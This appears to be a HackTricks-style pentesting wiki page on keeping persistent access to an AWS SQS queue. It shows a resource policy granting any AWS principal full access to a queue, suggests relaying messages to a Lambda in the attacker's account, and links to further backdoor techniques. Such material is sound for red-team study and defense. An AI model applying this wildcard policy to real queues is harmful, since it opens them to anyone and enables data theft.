AWS - SQS Persistence
{{#include ../../../../banners/hacktricks-training.md}}
SQS
For more information check:
{{#ref}}
../../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}
Using resource policy
In SQS you need to indicate with an IAM policy who has access to read and write. It's possible to indicate external accounts, ARN of roles, or even "*".\
The following policy gives everyone in AWS access to everything in the queue called MyTestQueue:
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["SQS:*"],
"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
}
]
}
π Note
You could even **trigger a Lambda in the attacker's account every time a new message** is put in the queue (you would need to re-put it). For this follow these instructions: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
More SQS Persistence Techniques
{{#ref}}
aws-sqs-dlq-backdoor-persistence.md
{{#endref}}
{{#ref}}
aws-sqs-orgid-policy-backdoor.md
{{#endref}}
{{#include ../../../../banners/hacktricks-training.md}}